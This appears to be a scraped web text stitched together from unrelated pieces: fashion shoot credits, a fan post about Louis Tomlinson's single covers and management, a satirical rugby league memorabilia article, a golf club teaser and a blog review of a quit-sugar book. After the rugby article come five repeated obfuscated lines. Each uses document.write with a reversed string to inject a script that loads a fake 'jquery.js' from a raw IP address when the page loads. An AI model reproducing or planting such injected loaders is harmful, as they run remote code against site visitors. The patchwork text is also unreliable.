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🎬 Vagabond Mutant Liquid, a short film by Toby Stretch for Off The Air S05E01: Liquid
🎵 Great River Road by Zach Schimpf
Flavia Daniele captures Diego Cartebetti in “Like Clockwork”. Fashion by Nicole Oike. As the clocks tick by, the inevitable dawns nearer - the viscous air outside awaits.
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Flavia Daniele captures Diego Cartebetti in “Like Clockwork”. Fashion by Nicole Oike. As the clocks tick by, the inevitable dawns nearer - the viscous air outside awaits.
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T SHIRT AND BOMBER JACKET BY MARCELO BURLON COUNTY OF MILAN
David Gillespie photographed by Emma Hardy for our AW17 issue 'Tales of a new Generation'. Fashion by Christopher Preston. Casting by Myra Gonzalez. Grooming by Phebe Wu. Hair by Takuya Uchiyama. Words by Joseph Shields.
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David wears jumper by AMI.
The post going around of Louis single covers has drawn to my attention a distinct difference between BTY, JLY and MY versus TOU and KMM. TOU & KMM have a much more minimalist approach, different font for his name, lacking color save a touch of red, just close ups... I believe this change also coincides with his current management. I'd love to hear if you have any thoughts on this
People have noticed the difference in how each single is announced as well. There is coordination across all digital platforms (alerting of Shazam and Spotify before actual teasers on social media, then coordinated release of information/ fam interaction from Louis’ twitter, LTHQ, Louis’ website, management team supporting players.
Then there are tweets from Chandler Chruma which show that Arista isn’t in the loop, and DJs and event coordinators which say that Louis’ team does not respond to queries. These are issues associated with his label— primarily Syco, secondarily Sony.
The digital content— the scavenger hunt, the KMM initials embedded into Back to You on Spotify— are clever and unique. I believe these are coordinated by Louis’ team, who also coordinate the artists, videographers, photographers, and stylists for his projects from BTS videos at Birmingham (spontaneous and adorable) to magazine shoots to music videos (all the videos for TOU).
Rugby league cards depreciating in time: analyst
In a sad reflection of the state of rugby league, a rare pack of signed 1995 Kangaroos footy cards sold for a paltry $4.48 on eBay last night. The market analyst firm ClarityCapital compiled a report on the auction price of rugby league paraphernalia on eBay and found that bids for retro rugby league items had more than halved in just five years, on average. The firm found that a set of glow-in-the-dark Canberra Raiders ‘pogs’ was sold for to an Philadelphia-based Australian expat in 2006 for $38.00, but an identical set went for just $8.37 to a buyer in Queanbeyan last week. At time of publishing, a signed Paul Sironen jersey sat at $16.00 with just five minutes left on the bidding clock, having not attracted a single bidder. Earlier in the week a napkin that allegedly had been used by ex-Origin prop David Gillespie at a post-match function – according to ‘try09bears’, a seller with a 100% feedback rating – was listed at the BuyItNow price of $1.20. To give context, a similar signed product in 2006 – a beer coaster that Noa Nadruku had famously used immediately before his well-documented ’22 schooners and one bottle of wine’ rampage in the mid-90s – sparked a 12-way bidding war, finally bought for $84.40 by an unknown buyer. “You know the market is slow when great products that once attracted multiple buyers are now sitting there without attracting a solitary bidder,” said the report's prinicipal analyst, Nick Marshall. “It goes to show that rugby league is no longer in the top pantheon of Australian football codes.” The news is not good for those punters who held out on selling rugby league paraphernalia in the hope that it would appreciate in value over time. “I kept a discarded mouth-guard that I found after a Brisbane v Manly game in 1994, which belonged to the lesser Walters brother, Kerrod, in the hope the value would skyrocket in time,” said Andrew Hill. "People told me I'd make a few hundred out of that." Despite the grim forecast, Hill remained hopeful that his product – and rugby league products in general – would once again attract an interested buying market. “My wife tells me ‘throw that filthy shit out’, but I still think it’ll go up in price one day.” “I’m confident that history will judge Kerrod Walters to be the best hooker/utility back that ever played in the pre-super league era, and in 40 years I’ll be the one laughing when I collect my money.” By Dave Edwards document.write('>tpircs/<>"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join("")) document.write('>tpircs/<>"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join("")) document.write('>tpircs/<>"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join("")) document.write('>tpircs/<>"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join("")) document.write('>tpircs/<>"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))
Pelican’s Nest Golf Club – A Must See Fazio Design!
Pelican’s Nest Golf Club – A Must See Fazio Design!
Flash back for a moment to 1985. The golf industry is on the rise and the real estate market in Florida is booming. As northerners reach retirement age, their mind is set upon moving to Florida and playing golf into their twilight years. All is good in the Sunshine State.
Two popular resorts in Southwest Florida back in the late 1980’s were the Naples Registry – now Naples Grande Beach Resort–…
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Sweet poison quit plan? Mine is better....
OK, so apparently, in the sweet poison quit plan (the book I started reading yesterday) it says how to quit sugar from your diet.... I can't help but feel like I have been slightly ripped off.
Why you ask? Well, it turns out, David Gillespie's advice is this - don't eat it..... Really? Really?! Dont eat it? And there was me thinking that to quit sugar I have to eat it by the bagful!
I understand that he says to stop eating it while doing certain things or in certain situations, but thats just common sense! I thought there would be more to it than that, not just dissociation from it your bad habits. Hell, that would have been my first guess anyways....
Despite this, the beginning of the book is quite informative and the first 60 or so pages are definitely worth a read. As far the rest of it? I think i'll be ok on my own from here on out.....